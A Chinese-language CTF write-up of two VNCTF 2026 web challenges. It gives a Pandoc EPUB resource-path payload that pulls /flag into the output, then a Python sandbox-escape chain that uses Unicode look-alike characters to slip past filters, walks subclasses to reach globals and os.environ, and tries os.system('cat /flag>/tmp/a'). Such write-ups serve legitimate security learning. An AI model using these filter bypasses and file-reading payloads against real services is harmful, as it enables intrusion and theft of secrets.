VNCTF 2026 Web 部分题目解题思路

利用 Pandoc 的特性：Pandoc 生成 EPUB 时有一个特性叫 "Resource Fetching"（资源抓取），只要通过构造特殊的资源抓取语句来改变 EPUB 抓取的资源的路径即可达到类似于'文件包含'的效果，将 flag 打包下载下来。

Payload（可多设几条路径提高拿到 flag 的概率）：

---
resource-path: ["/", "/tmp", "/home/ctf", "."]
---
![flag](/flag)

下载下来后可以改后缀为 .zip 来解压。

在解压包中拿到 flag：

原本想试试 docx 和 html 的漏洞，但试了几个常见的 payload 发现没那么简单。

I really really really

题目考察的是 Python 沙箱逃逸。

先进行简单的 fuzz 测试，发现常规的 ' " [ ] { } __ ; 和数字 0-9 都被过滤了，hint 提及 unicode，于是搜寻这些字符有关的 unicode 编码其他格式。

发现单引号：ʼ (U+02BC) 修饰符右单引号没被过滤。

发现 _ 没被过滤。

想着引入模块去做，结果发现几乎全部的模块都被删了。

首先解决 __ 的问题，fuzz 测试了多种组合：_̲, ﹍﹎, ﹏﹍, ⁔﹍, ﹋﹌ 等。

最后发现只有 _̲ 和 ﹎_ 没被过滤，_̲ 系统自动识别成了普通字符。

随后是关键字的问题，本来想着用 ʼ claʼ +ʼss ʼ 的方法绕过的，但是失败了，后来看到题目的字体后才发觉可以试试数学花体字母 𝓬𝓵𝓪𝓼𝓼，于是就成功了。

等基本的完工后就运用一点 SSTI 的知识读取 flag，但始终返回空白。

经排查发现在环境变量里也有 flag，找到另一条生路。

鉴于单行字符不能超过 30，采用拼接的方式串联起 payload：

a=()
b=a._﹍𝓬𝓵𝓪𝓼𝓼﹍_
c=b._﹍𝓫𝓪𝓼𝓮﹍_
d=c._﹍𝓼𝓾𝓫𝓬𝓵𝓪𝓼𝓼𝓮𝓼﹍_()
for x in d:
    try:
        g=x._﹍𝓲𝓷𝓲𝓽﹍_. _﹍𝓰𝓵𝓸𝓫𝓪𝓵𝓼﹍_
    except:pass

随后通过报错触发 AssertionError: <r 的内容>，错误信息一定会显示在网页回显中，读取 environ 字典。

a=()
b=a._﹍𝓬𝓵𝓪𝓼𝓼﹍_
c=b._﹍𝓫𝓪𝓼𝓮﹍_
d=c._﹍𝓼𝓾𝓫𝓬𝓵𝓪𝓼𝓼𝓮𝓼﹍_()
r=()
for x in d:
    try:
        g=x._﹍𝓲𝓷𝓲𝓽﹍_. _﹍𝓰𝓵𝓸𝓫𝓪𝓵𝓼﹍_
        e=g.get(k).environ
        r=e
    except:pass
assert ...!=...,r

回显如下：

跟 AI 探讨后发现原来不是模块被删了，而是放到别的模块去了，所以只能利用一个 try/except 循环遍历 __init__.__globals__ 找到包含 os 模块的 globals。

最后生成的 payload 如下：

a=()
b=a._﹍𝓬𝓵𝓪𝓼𝓼﹍_
c=b._﹍𝓫𝓪𝓼𝓮﹍_
d=c._﹍𝓼𝓾𝓫𝓬𝓵𝓪𝓼𝓼𝓮𝓼﹍_()
r=()
for x in d:
    try:
        g=x._﹍𝓲𝓷𝓲𝓽﹍_. _﹍𝓰𝓵𝓸𝓫𝓪𝓵𝓼﹍_
        for k in g:
            try:
                e=g.get(k).environ
                r=e
            except:pass
    except:pass
assert ...!=...,r

在环境变量中找到 flag。

原本想把 flag 导入到同目录的文件中：

a=()
b=a._﹍𝓬𝓵𝓪𝓼𝓼﹍_
c=b._﹍𝓫𝓪𝓼𝓮﹍_
d=c._﹍𝓼𝓾𝓫𝓬𝓵𝓪𝓼𝓼𝓮𝓼﹍_()
r=()
for x in d:
    try:
        g=x._﹍𝓲𝓷𝓲𝓽﹍_. _﹍𝓰𝓵𝓸𝓫𝓪𝓵𝓼﹍_
        h=g.get(ʼosʼ)
        h.system(ʼcat /flag>/tmp/aʼ)
    except:
        pass
assert ...!=...,r

但是代码太长了，导致不能实现。